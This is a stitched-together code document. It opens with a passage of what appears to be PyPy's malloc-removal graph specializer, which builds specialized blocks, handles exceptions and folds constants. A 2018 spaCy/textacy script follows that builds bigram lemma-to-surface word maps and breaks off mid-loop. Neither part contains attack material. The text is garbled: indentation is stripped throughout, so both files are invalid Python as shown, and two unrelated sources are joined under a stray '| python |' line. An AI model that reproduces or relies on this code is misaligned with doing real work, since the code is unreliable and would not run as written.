nodelist, renamings, v_expand_malloc=None):
assert len(nodelist) == len(targetblock.inputargs)
#
if is_except(targetblock):
v_expand_malloc = None
while currentframe.callerframe is not None:
currentframe = currentframe.callerframe
newlink = self.handle_catch(currentframe, nodelist, renamings)
if newlink:
return newlink
else:
targetblock = self.exception_escapes(nodelist, renamings)
assert len(nodelist) == len(targetblock.inputargs)
if (currentframe.callerframe is None and
is_trivial_nodelist(nodelist)):
# there is no more VirtualSpecNodes being passed around,
# so we can stop specializing
rtnodes = nodelist
specblock = targetblock
else:
if is_return(targetblock):
v_expand_malloc = None
newframe = self.return_to_caller(currentframe, nodelist[0])
else:
targetnodes = dict(zip(targetblock.inputargs, nodelist))
newframe = VirtualFrame(targetblock, 0, targetnodes,
callerframe=currentframe.callerframe,
calledgraphs=currentframe.calledgraphs)
rtnodes = newframe.find_rt_nodes()
specblock = self.get_specialized_block(newframe, v_expand_malloc)
linkargs = [renamings[rtnode] for rtnode in rtnodes]
return Link(linkargs, specblock)
def return_to_caller(self, currentframe, retnode):
callerframe = currentframe.callerframe
if callerframe is None:
raise ForcedInline("return block")
nodelist = callerframe.nodelist
callerframe = callerframe.shallowcopy()
callerframe.nodelist = []
for node in nodelist:
if isinstance(node, FutureReturnValue):
node = retnode
callerframe.nodelist.append(node)
return callerframe
def handle_catch(self, catchingframe, nodelist, renamings):
if not self.has_exception_catching(catchingframe):
return None
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
exc_type = v_exc_type.value
elif isinstance(exc_value_node, VirtualSpecNode):
EXCTYPE = exc_value_node.typedesc.MALLOCTYPE
exc_type = self.mallocv.EXCTYPE_to_vtable[EXCTYPE]
else:
raise CannotVirtualize("raising non-constant exc type")
excdata = self.mallocv.excdata
assert catchingframe.sourceblock.exits[0].exitcase is None
for catchlink in catchingframe.sourceblock.exits[1:]:
if excdata.fn_exception_match(exc_type, catchlink.llexitcase):
# Match found. Follow this link.
mynodes = catchingframe.get_nodes_in_use()
for node, attr in zip(nodelist,
['last_exception', 'last_exc_value']):
v = getattr(catchlink, attr)
if isinstance(v, Variable):
mynodes[v] = node
#
nodelist = []
for v in catchlink.args:
if isinstance(v, Variable):
node = mynodes[v]
else:
node = getconstnode(v, renamings)
nodelist.append(node)
return self.create_outgoing_link(catchingframe,
catchlink.target,
nodelist, renamings)
else:
# No match at all, propagate the exception to the caller
return None
def has_exception_catching(self, catchingframe):
if catchingframe.sourceblock.exitswitch != c_last_exception:
return False
else:
operations = catchingframe.sourceblock.operations
assert 1 <= catchingframe.nextopindex <= len(operations)
return catchingframe.nextopindex == len(operations)
def exception_escapes(self, nodelist, renamings):
# the exception escapes
if not is_trivial_nodelist(nodelist):
# start of hacks to help handle_catch()
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
# cannot improve: handle_catch() would already be happy
# by seeing the exc_type as a constant
pass
elif isinstance(exc_value_node, VirtualSpecNode):
# can improve with a strange hack: we pretend that
# the source code jumps to a block that itself allocates
# the exception, sets all fields, and raises it by
# passing a constant type.
typedesc = exc_value_node.typedesc
return self.get_exc_reconstruction_block(typedesc)
else:
# cannot improve: handle_catch() will have no clue about
# the exception type
pass
raise CannotVirtualize("except block")
targetblock = self.graph.exceptblock
self.mallocv.fixup_except_block(targetblock)
return targetblock
def get_exc_reconstruction_block(self, typedesc):
exceptblock = self.graph.exceptblock
self.mallocv.fixup_except_block(exceptblock)
TEXC = exceptblock.inputargs[0].concretetype
TVAL = exceptblock.inputargs[1].concretetype
#
v_ignored_type = varoftype(TEXC)
v_incoming_value = varoftype(TVAL)
block = Block([v_ignored_type, v_incoming_value])
#
c_EXCTYPE = Constant(typedesc.MALLOCTYPE, lltype.Void)
v = varoftype(lltype.Ptr(typedesc.MALLOCTYPE))
c_flavor = Constant({'flavor': 'gc'}, lltype.Void)
op = SpaceOperation('malloc', [c_EXCTYPE, c_flavor], v)
block.operations.append(op)
#
for name, FIELDTYPE in typedesc.names_and_types:
EXACTPTR = lltype.Ptr(typedesc.name2subtype[name])
c_name = Constant(name)
c_name.concretetype = lltype.Void
#
v_in = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v_incoming_value], v_in)
block.operations.append(op)
#
v_field = varoftype(FIELDTYPE)
op = SpaceOperation('getfield', [v_in, c_name], v_field)
block.operations.append(op)
#
v_out = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v], v_out)
block.operations.append(op)
#
v0 = varoftype(lltype.Void)
op = SpaceOperation('setfield', [v_out, c_name, v_field], v0)
block.operations.append(op)
#
v_exc_value = varoftype(TVAL)
op = SpaceOperation('cast_pointer', [v], v_exc_value)
block.operations.append(op)
#
exc_type = self.mallocv.EXCTYPE_to_vtable[typedesc.MALLOCTYPE]
c_exc_type = Constant(exc_type, TEXC)
block.closeblock(Link([c_exc_type, v_exc_value], exceptblock))
return block
def get_specialized_block(self, virtualframe, v_expand_malloc=None):
key = virtualframe.getfrozenkey()
specblock = self.specialized_blocks.get(key)
if specblock is None:
orgblock = virtualframe.sourceblock
assert len(orgblock.exits) != 0
spec = BlockSpecializer(self, v_expand_malloc)
spec.initialize_renamings(virtualframe)
self.pending_specializations.append(spec)
specblock = spec.specblock
self.specialized_blocks[key] = specblock
return specblock
def propagate_specializations(self):
while self.pending_specializations:
spec = self.pending_specializations.pop()
spec.specialize_operations()
spec.follow_exits()
class BlockSpecializer(object):
def __init__(self, graphbuilder, v_expand_malloc=None):
self.graphbuilder = graphbuilder
self.v_expand_malloc = v_expand_malloc
self.specblock = Block([])
def initialize_renamings(self, virtualframe, keep_inputargs=False):
# we make a copy of the original 'virtualframe' because the
# specialize_operations() will mutate some of its content.
virtualframe = virtualframe.copy({})
self.virtualframe = virtualframe
self.nodes = virtualframe.get_nodes_in_use()
self.renamings = {} # {RuntimeSpecNode(): Variable()}
if keep_inputargs:
assert virtualframe.varlist == virtualframe.sourceblock.inputargs
specinputargs = []
for i, rtnode in enumerate(virtualframe.find_rt_nodes()):
if keep_inputargs:
v = virtualframe.varlist[i]
assert v.concretetype == rtnode.TYPE
else:
v = rtnode.newvar()
self.renamings[rtnode] = v
specinputargs.append(v)
self.specblock.inputargs = specinputargs
def setnode(self, v, node):
assert v not in self.nodes
self.nodes[v] = node
def getnode(self, v):
if isinstance(v, Variable):
return self.nodes[v]
else:
return getconstnode(v, self.renamings)
def rename_nonvirtual(self, v, where=None):
if not isinstance(v, Variable):
return v
node = self.nodes[v]
if not isinstance(node, RuntimeSpecNode):
raise CannotVirtualize(where)
return self.renamings[node]
def expand_nodes(self, nodelist):
rtnodes, vtnodes = find_all_nodes(nodelist)
return [self.renamings[rtnode] for rtnode in rtnodes]
def specialize_operations(self):
newoperations = []
self.ops_produced_by_last_op = 0
# note that 'self.virtualframe' can be changed during the loop!
while True:
operations = self.virtualframe.sourceblock.operations
try:
op = operations[self.virtualframe.nextopindex]
self.virtualframe.nextopindex += 1
except IndexError:
break
meth = getattr(self, 'handle_op_' + op.opname,
self.handle_default)
newops_for_this_op = meth(op)
newoperations += newops_for_this_op
self.ops_produced_by_last_op = len(newops_for_this_op)
for op in newoperations:
if op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.virtualframe.calledgraphs:
raise CannotVirtualize("recursion in residual call")
self.specblock.operations = newoperations
def follow_exits(self):
block = self.virtualframe.sourceblock
self.specblock.exitswitch = self.rename_nonvirtual(block.exitswitch,
'exitswitch')
links = block.exits
catch_exc = self.specblock.exitswitch == c_last_exception
if not catch_exc and isinstance(self.specblock.exitswitch, Constant):
# constant-fold the switch
for link in links:
if link.exitcase == 'default':
break
if link.llexitcase == self.specblock.exitswitch.value:
break
else:
raise Exception("exit case not found?")
links = (link,)
self.specblock.exitswitch = None
if catch_exc and self.ops_produced_by_last_op == 0:
# the last op of the sourceblock did not produce any
# operation in specblock, so we need to discard the
# exception-catching.
catch_exc = False
links = links[:1]
assert links[0].exitcase is None # the non-exception-catching case
self.specblock.exitswitch = None
newlinks = []
for link in links:
is_catch_link = catch_exc and link.exitcase is not None
if is_catch_link:
extravars = []
for attr in ['last_exception', 'last_exc_value']:
v = getattr(link, attr)
if isinstance(v, Variable):
rtnode = RuntimeSpecNode(v, v.concretetype)
self.setnode(v, rtnode)
self.renamings[rtnode] = v = rtnode.newvar()
extravars.append(v)
linkargsnodes = [self.getnode(v1) for v1 in link.args]
#
newlink = self.graphbuilder.create_outgoing_link(
self.virtualframe, link.target, linkargsnodes,
self.renamings, self.v_expand_malloc)
#
if self.specblock.exitswitch is not None:
newlink.exitcase = link.exitcase
if hasattr(link, 'llexitcase'):
newlink.llexitcase = link.llexitcase
if is_catch_link:
newlink.extravars(*extravars)
newlinks.append(newlink)
self.specblock.closeblock(*newlinks)
def make_rt_result(self, v_result):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
v_new = newrtnode.newvar()
self.renamings[newrtnode] = v_new
return v_new
def make_const_rt_result(self, v_result, value):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
if v_result.concretetype is not lltype.Void:
assert v_result.concretetype == lltype.typeOf(value)
c_value = Constant(value)
c_value.concretetype = v_result.concretetype
self.renamings[newrtnode] = c_value
def handle_default(self, op):
newargs = [self.rename_nonvirtual(v, op) for v in op.args]
constresult = try_fold_operation(op.opname, newargs,
op.result.concretetype)
if constresult:
self.make_const_rt_result(op.result, constresult[0])
return []
else:
newresult = self.make_rt_result(op.result)
return [SpaceOperation(op.opname, newargs, newresult)]
def handle_unreachable(self, op):
from rpython.rtyper.lltypesystem.rstr import string_repr
msg = 'unreachable: %s' % (op,)
ll_msg = string_repr.convert_const(msg)
c_msg = Constant(ll_msg, lltype.typeOf(ll_msg))
newresult = self.make_rt_result(op.result)
return [SpaceOperation('debug_fatalerror', [c_msg], newresult)]
def handle_op_getfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
self.setnode(op.result, node.fields[index])
return []
else:
return self.handle_default(op)
def handle_op_setfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
if node.readonly:
raise ForcedInline(op)
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
node.fields[index] = self.getnode(op.args[2])
return []
else:
return self.handle_default(op)
def handle_op_same_as(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_cast_pointer(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
SOURCEPTR = lltype.Ptr(node.typedesc.MALLOCTYPE)
TARGETPTR = op.result.concretetype
try:
if lltype.castable(TARGETPTR, SOURCEPTR) < 0:
raise lltype.InvalidCast
except lltype.InvalidCast:
return self.handle_unreachable(op)
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_ptr_nonzero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, True)
return []
else:
return self.handle_default(op)
def handle_op_ptr_iszero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, False)
return []
else:
return self.handle_default(op)
def handle_op_ptr_eq(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is node1)
return []
else:
return self.handle_default(op)
def handle_op_ptr_ne(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is not node1)
return []
else:
return self.handle_default(op)
def handle_op_malloc(self, op):
if op.result is self.v_expand_malloc:
MALLOCTYPE = op.result.concretetype.TO
typedesc = self.graphbuilder.mallocv.getmalloctypedesc(MALLOCTYPE)
virtualnode = VirtualSpecNode(typedesc, [])
self.setnode(op.result, virtualnode)
for name, FIELDTYPE in typedesc.names_and_types:
fieldnode = RuntimeSpecNode(name, FIELDTYPE)
virtualnode.fields.append(fieldnode)
c = Constant(FIELDTYPE._defl())
c.concretetype = FIELDTYPE
self.renamings[fieldnode] = c
self.v_expand_malloc = None # done
return []
else:
return self.handle_default(op)
def handle_op_direct_call(self, op):
graph = graph_called_by(op)
if graph is None:
return self.handle_default(op)
nb_args = len(op.args) - 1
assert nb_args == len(graph.getargs())
newnodes = [self.getnode(v) for v in op.args[1:]]
myframe = self.get_updated_frame(op)
mallocv = self.graphbuilder.mallocv
if op.result is self.v_expand_malloc:
# move to inlining the callee, and continue looking for the
# malloc to expand in the callee's graph
op_to_remove = mallocv.inline_and_remove[graph]
self.v_expand_malloc = op_to_remove.result
return self.handle_inlined_call(myframe, graph, newnodes)
argnodes = copynodes(newnodes, flagreadonly=myframe.find_vt_nodes())
kind, newgraph = mallocv.get_specialized_graph(graph, argnodes)
if kind == 'trivial':
return self.handle_default(op)
elif kind == 'inline':
return self.handle_inlined_call(myframe, graph, newnodes)
elif kind == 'call':
return self.handle_residual_call(op, newgraph, newnodes)
elif kind == 'fail':
raise CannotVirtualize(op)
else:
raise ValueError(kind)
def get_updated_frame(self, op):
sourceblock = self.virtualframe.sourceblock
nextopindex = self.virtualframe.nextopindex
self.nodes[op.result] = FutureReturnValue(op)
myframe = VirtualFrame(sourceblock, nextopindex, self.nodes,
self.virtualframe.callerframe,
self.virtualframe.calledgraphs)
del self.nodes[op.result]
return myframe
def handle_residual_call(self, op, newgraph, newnodes):
fspecptr = getfunctionptr(newgraph)
newargs = [Constant(fspecptr,
concretetype=lltype.typeOf(fspecptr))]
newargs += self.expand_nodes(newnodes)
newresult = self.make_rt_result(op.result)
newop = SpaceOperation('direct_call', newargs, newresult)
return [newop]
def handle_inlined_call(self, myframe, graph, newnodes):
assert len(graph.getargs()) == len(newnodes)
targetnodes = dict(zip(graph.getargs(), newnodes))
calledgraphs = myframe.calledgraphs.copy()
if graph in calledgraphs:
raise CannotVirtualize("recursion during inlining")
calledgraphs[graph] = True
calleeframe = VirtualFrame(graph.startblock, 0,
targetnodes, myframe, calledgraphs)
self.virtualframe = calleeframe
self.nodes = calleeframe.get_nodes_in_use()
return []
def handle_op_indirect_call(self, op):
v_func = self.rename_nonvirtual(op.args[0], op)
if isinstance(v_func, Constant):
op = SpaceOperation('direct_call', [v_func] + op.args[1:-1],
op.result)
return self.handle_op_direct_call(op)
else:
return self.handle_default(op)
class FutureReturnValue(object):
def __init__(self, op):
self.op = op # for debugging
def getfrozenkey(self, memo):
return None
def accumulate_nodes(self, rtnodes, vtnodes):
pass
def copy(self, memo, flagreadonly):
return self
# ____________________________________________________________
# helpers
def vars_alive_through_op(block, index):
# NB. make sure this always returns the variables in the same order
if len(block.exits) == 0:
return block.inputargs # return or except block
result = []
seen = {}
def see(v):
if isinstance(v, Variable) and v not in seen:
result.append(v)
seen[v] = True
# don't include the variables produced by the current or future operations
for op in block.operations[index:]:
seen[op.result] = True
# don't include the extra vars produced by exception-catching links
for link in block.exits:
for v in link.getextravars():
seen[v] = True
# but include the variables consumed by the current or any future operation
for op in block.operations[index:]:
for v in op.args:
see(v)
see(block.exitswitch)
for link in block.exits:
for v in link.args:
see(v)
return result
def is_return(block):
return len(block.exits) == 0 and len(block.inputargs) == 1
def is_except(block):
return len(block.exits) == 0 and len(block.inputargs) == 2
class CannotConstFold(Exception):
pass
def try_fold_operation(opname, args_v, RESTYPE):
args = []
for c in args_v:
if not isinstance(c, Constant):
return
args.append(c.value)
try:
op = getattr(llop, opname)
except AttributeError:
return
if not op.is_pure(args_v):
return
try:
result = op(RESTYPE, *args)
except TypeError:
pass
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
pass
#log.WARNING('constant-folding %s%r:' % (opname, args_v))
#log.WARNING(' %s: %s' % (e.__class__.__name__, e))
else:
return (result,)
def getconstnode(v, renamings):
rtnode = RuntimeSpecNode(None, v.concretetype)
renamings[rtnode] = v
return rtnode
def graph_called_by(op):
assert op.opname == 'direct_call'
fobj = op.args[0].value._obj
graph = getattr(fobj, 'graph', None)
return graph
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# # # #
# model-bi-gramms.py
# @author Zhibin.LU
# @created Fri Feb 23 2018 17:14:32 GMT-0500 (EST)
# @last-modified Wed Mar 14 2018 19:11:45 GMT-0400 (EDT)
# @website: https://louis-udm.github.io
# # # #
import gzip
import time
from collections import Counter
import regex as re
import spacy
import textacy
import loader
def load_data(folder):
"""
    Load the corpus files in ``folder`` and return two strings: the concatenated
    input (lemma) words and the concatenated target (surface) words.
"""
file_paths = loader.list_files(folder)
input_words = []
target_words = []
for file_path in file_paths:
with gzip.open(file_path, 'rt', encoding='ISO-8859-1') as f:
lines = f.read().split('\n')
for line in lines:
if line.startswith('#begin') or line.startswith('#end'):
continue
line = line.encode("ascii", errors="ignore").decode()
split_result = line.split('\t')
if len(split_result) == 2:
target_word, input_word = split_result
input_word = input_word.lower().strip()
target_word = target_word.lower().strip()
pattern = re.compile(r'\'')
input_word = re.sub(pattern, '', input_word)
target_word = re.sub(pattern, '', target_word)
input_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", input_word)
target_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", target_word)
pattern = re.compile(r'\d+s')
m1 = re.search(pattern, input_word)
m2 = re.search(pattern, target_word)
if m2 is not None and m1 is None:
input_word = re.sub('(\d+)', r"\1s", input_word)
input_word = re.sub('(\d+)', r" \1 ", input_word)
target_word = re.sub('(\d+)', r" \1 ", target_word)
input_word = re.sub(' +', ' ', input_word)
target_word = re.sub(' +', ' ', target_word)
if input_word == '':
continue
input_words.append(input_word)
target_words.append(target_word)
return ' '.join(input_words), ' '.join(target_words)
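# Note on the expected input format (inferred from the parsing above; the sample line is
# illustrative only): each gzip'ed file holds tab-separated lines of the form
# "surface_form<TAB>lemma", e.g. "dogs\tdog", with '#begin' / '#end' marker lines skipped.
# The first returned string is the lemma-side corpus, the second the surface-side corpus.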
print("{} Loading data...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
train_lemm_corpus, train_surf_corpus = load_data('data/train')
test_lemm_corpus, test_surf_corpus = load_data('data/test')
train_lemm_corpus = re.sub(' +', ' ', train_lemm_corpus)
train_surf_corpus = re.sub(' +', ' ', train_surf_corpus)
test_lemm_corpus = re.sub(' +', ' ', test_lemm_corpus)
test_surf_corpus = re.sub(' +', ' ', test_surf_corpus)
# %%
'''
Get the 2-gram model, all types, and all sentences of the train lemma set.
Get the 2-gram model, all types, and all sentences of the train surface set.
Get all types and all sentences of the test lemma set.
Get all types and all sentences of the test surface set.
'''
print("{} Training model...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
start_time = time.time()
nlp = spacy.load('en', disable=['parser', 'tagger'])
train_lemm_tacy_doc = nlp(train_lemm_corpus)
train_surf_tacy_doc = nlp(train_surf_corpus)
test_lemm_tacy_doc = nlp(test_lemm_corpus)
test_surf_tacy_doc = nlp(test_surf_corpus)
print('Tokens of train_lemm_tacy_doc: ', len(train_lemm_tacy_doc))
print('Tokens of train_surf_tacy_doc: ', len(train_surf_tacy_doc))
if len(train_lemm_tacy_doc) != len(train_surf_tacy_doc):
    print('Warning: the number of tokens of lemma and surface in train is not equal !!!!!!')
print('Tokens of test_lemm_tacy_doc: ', len(test_lemm_tacy_doc))
print('Tokens of test_surf_tacy_doc: ', len(test_surf_tacy_doc))
if len(test_lemm_tacy_doc) != len(test_surf_tacy_doc):
    print('Warning: the number of tokens of lemma and surface in test is not equal !!!!!!')
# %%
train_surf_tacy_sents = []
start_ind = 0
for token in train_surf_tacy_doc:
if token.text in ['.', '?', '!']:
train_surf_tacy_sents.append(train_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train surf:', len(train_surf_tacy_sents))
train_lemm_tacy_sents = []
start_ind = 0
for token in train_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
train_lemm_tacy_sents.append(train_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train lemm:', len(train_lemm_tacy_sents))
if len(train_surf_tacy_sents) != len(train_lemm_tacy_sents):
    print('Warning: the number of sentences of lemma and surface in train is not equal !!!!!!')
test_surf_tacy_sents = []
start_ind = 0
for token in test_surf_tacy_doc:
if token.text in ['.', '?', '!']:
test_surf_tacy_sents.append(test_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test surf:', len(test_surf_tacy_sents))
test_lemm_tacy_sents = []
start_ind = 0
for token in test_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
test_lemm_tacy_sents.append(test_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test lemm:', len(test_lemm_tacy_sents))
if len(test_surf_tacy_sents) != len(test_lemm_tacy_sents):
    print('Warning: the number of sentences of lemma and surface in test is not equal !!!!!!')
# %%
train_lemm_tacy_doc = textacy.Doc(train_lemm_tacy_doc)
train_surf_tacy_doc = textacy.Doc(train_surf_tacy_doc)
train_lemm_2grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 2grams bag:', len(train_lemm_2grams_bag))
train_lemm_1grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 1grams bag:', len(train_lemm_1grams_bag))
train_surf_2grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 2grams bag:', len(train_surf_2grams_bag))
train_surf_1grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 1grams bag:', len(train_surf_1grams_bag))
test_lemm_tacy_doc = textacy.Doc(test_lemm_tacy_doc)
test_surf_tacy_doc = textacy.Doc(test_surf_tacy_doc)
test_lemm_1grams_bag = test_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test lemm 1grams bag:', len(test_lemm_1grams_bag))
test_surf_1grams_bag = test_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test surf 1grams bag:', len(test_surf_1grams_bag))
# %%
# test code
print(type(train_lemm_2grams_bag), len(train_lemm_2grams_bag))
print(type(train_lemm_1grams_bag), len(train_lemm_1grams_bag))
print('him . ', train_lemm_2grams_bag['him .'])
print('. the', train_lemm_2grams_bag['. the'])
i = 0
for sent in train_lemm_tacy_sents:
print(sent.text)
i += 1
if i > 10: break
# test code
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_surf_tacy_doc.tokens)):
# # if chs[0].text=='have' and chs[1].text=="'":
# # print(i,chs[0],chs[1])
# # break
# if chs[0].text not in ['be','find','get','have','a','he','lie','use','leave','go','see','she','we','i','would'] and chs[0].text[0]!=chs[1].text[0]:
# print(i,chs[0],chs[1])
# break
# # if i>=740 and i<=750:
# # print(i,chs[0],chs[1])
#
# # print(train_lemm_corpus[0:200])
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_lemm_corpus.split(' '))):
# if chs[0].text!=chs[1]:
# print(i,'|'+chs[0].text+'|','|'+chs[1]+'|')
# # break
# if i>345:
# break
# %%
'''
Get all pair of surf-lemma and their count on train data set.
'''
pairs_list = []
for lemma, surf in zip(train_lemm_tacy_doc, train_surf_tacy_doc):
pairs_list.append(surf.text.strip() + ' ' + lemma.text.strip())
train_surf_lemm_map = {}
for i, pair in enumerate(pairs_list):
if pair not in train_surf_lemm_map:
train_surf_lemm_map[pair] = pairs_list.count(pair)
# test code
print('are be ', train_surf_lemm_map['are be'])
# print('( ( ',train_surf_lemm_map['( ('])
# print('. . ',train_surf_lemm_map['. .'])
# %%
# test code
# print('(rimatara reed) ',train_lemm_2grams_bag['rimatara reed'])
print('(you be) ', train_lemm_2grams_bag['you be'])
print('(he go) ', train_lemm_2grams_bag['he go'])
print('p(be|you)=', train_lemm_2grams_bag['you be'] / train_lemm_1grams_bag['you'])
print('p(cat|a)=', train_lemm_2grams_bag['a cat'] / train_lemm_1grams_bag['a'])
print('p(am|i)=', train_surf_2grams_bag['i am'] / train_surf_1grams_bag['i'])
print('p(be-o|are-s)=', train_surf_lemm_map['are be'] / train_surf_1grams_bag['are'])
print('p(.-o|.-s)=', train_surf_lemm_map['. .'] / train_surf_1grams_bag['.'])
# print('p(the|bos)=',train_surf_2grams_bag['. the'])
# %%
'''
Functions to evaluate the predictions
'''
def count_accuracy_raw(pred_corpus, target_corpus):
"""
Test accuracy, Raw accuracy
"""
count_accu = 0
total = 0
pred_sents = pred_corpus.split('.')
target_sents = target_corpus.split('.')
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = pred_sent.split(' ')
targ_list = target_sent.split(' ')
for pred_token, target_token in zip(pred_list, targ_list):
total += 1
if pred_token == target_token:
count_accu += 1
return count_accu, total
raw_acc_count, raw_count_total = count_accuracy_raw(train_lemm_corpus, train_surf_corpus)
print('test of Accuracy raw:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
def count_accuracy_spacy_raw(pred_sents, target_sents):
"""
Test accuracy, accuracy of spacy's token
"""
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
total += 1
for pred_token, target_token in zip(pred_sent, target_sent):
total += 1
if pred_token.text == target_token.text:
count_accu += 1
return count_accu, total
spacy_acc_count, spacy_count_total = count_accuracy_spacy_raw(train_lemm_tacy_sents, train_surf_tacy_sents)
print('test of Accuracy spacy:', spacy_acc_count, '/', spacy_count_total, '=', spacy_acc_count / spacy_count_total)
# this function is for when we want to stop before processing all sentences.
# otherwise, use metric.accuracy instead
def count_accuracy(pred_sents, target_sents):
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = re.split(r"-| |\?", pred_sent)
# pred_list=pred_sent.split(' ')
for pred_token, target_token in zip(pred_list, target_sent):
total += 1
if pred_token == target_token.text:
count_accu += 1
return count_accu, total
def decode_sents(vectors, type_list):
sents = []
for v in vectors:
sent = ' '.join(map(lambda x: type_list[x], v))
# print (sent)
sents.append(sent)
return sents
def decode_sent(vector, type_list):
return ' '.join(map(lambda x: type_list[x], vector))
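# Example (illustrative): decode_sent([0, 2, 1], ['a', 'b', 'c']) returns 'a c b',
# i.e. each index in the vector is mapped back to its type string and joined with spaces.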
# %%
'''
**** Bigram model predictor ****
'''
'''
Collect every [lemm(t-1), lemm(t)] -> surf(t) pair
and build a map of bigrams [lemm(t-1), lemm(t)] -> surface word,
in which the surface word is the most frequent one observed for that pair of [lemm(t-1), lemm(t)].
For example: if {[you be] -> are} occurs 3 times and {[you be] -> is} occurs once,
then map([you be]) = are.
'''
bigramms_lemm_surf_map = {}
bigramms_lemm_surf_count_map = {}
for lemm_sent, surf_sent in zip(train_lemm_tacy_sents, train_surf_tacy_sents):
for i, token in enumerate(zip(lemm_sent, surf_sent)):
if i == 0:
if token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[token[0].text] = [token[1].text]
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text] = [token[1].text]
lemm_pre = token[0].text
for k, v in bigramms_lemm_surf_count_map.items():
word_counts = Counter(v)
bigramms_lemm_surf_map[k] = word_counts.most_common(1)[0][0]
print('size of bi-grammes: ', len(bigramms_lemm_surf_map))
# test code
print('you be -> ', bigramms_lemm_surf_map['you be'])
# %%
'''
Bigram model predictor: prediction on the test data
'''
print('--Bigram model predictor: prediction on test data ---')
bigramms_pred_sents = []
count_accu = 0
for k, sent in enumerate(zip(test_lemm_tacy_sents, test_surf_tacy_sents)):
pred_sent = []
for i, token in enumerate(zip(sent[0], sent[1])):
if i == 0:
if token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
                # if no mapping exists for this lemma word, fall back to the lemma word itself
pred_sent.append(token[0].text)
                # count as correct if the unmapped lemma word equals the corresponding surface word
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[lemm_pre + ' ' + token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
                # if no mapping exists for this bigram, fall back to the lemma word itself
pred_sent.append(token[0].text)
